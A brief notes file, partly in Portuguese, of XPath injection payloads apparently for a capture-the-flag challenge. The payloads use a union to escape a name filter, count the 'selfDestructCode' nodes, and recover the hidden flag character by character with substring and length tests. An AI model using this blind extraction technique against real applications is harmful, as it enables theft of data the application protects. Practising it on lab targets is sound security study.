# Testa o XPath Injection 
/x[name='']|/military/district/staff[name='Straorg']

# Testa se as 5 primeiras letras são 'CHTB{' (de 'CHTB{senha}')
/x[name='']|/military/district/staff[substring(selfDestructCode,1,5) = 'CHTB{']|/x[name='']

# Find the number of selfDestructCode nodes (2)
/x[name='']|(/military/district/staff/selfDestructCode)[1]|/x[name='']
/x[name='']|(/military/district/staff/selfDestructCode)[2]|/x[name='']
/x[name='']|(/military/district/staff/selfDestructCode)[3]|/x[name='']

# Find the length of the selfDestructCode strings
# [1] = 21 chars
# [2] = 15 chars
/x[name='']|(/military/district/staff/selfDestructCode)[2][string-length(text()) > 1]|x[name='']

# Find the N'th char in the selfDestructCode string
/x[name='']|(/military/district/staff/selfDestructCode)[1][substring(text(), 1, 1) = 'C']